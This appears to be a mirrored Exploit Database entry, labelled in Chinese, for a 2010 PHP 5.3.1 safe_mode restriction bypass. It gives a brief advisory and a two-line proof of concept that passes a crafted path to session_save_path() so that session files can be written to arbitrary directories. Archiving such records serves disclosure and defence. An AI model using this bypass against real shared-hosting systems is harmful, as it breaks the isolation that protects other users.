PHP 5.3.1 – ‘session_save_path() Safe_mode()’ Restriction Bypass Exploiot

• Exploit Database
• 109 阅读

• 作者： Grzegorz Stachowiak
  日期： 2010-02-11
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33625/
• 1 2 3 4 5 6 7 8 9 10 11 12 13

  source: https://www.securityfocus.com/bid/38182/info   PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write session files in arbitrary directions.   This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; the 'safe_mode' restrictions are assumed to isolate users from each other.   {   session_save_path(";;/byp/;a/../../humhum"); session_start();   }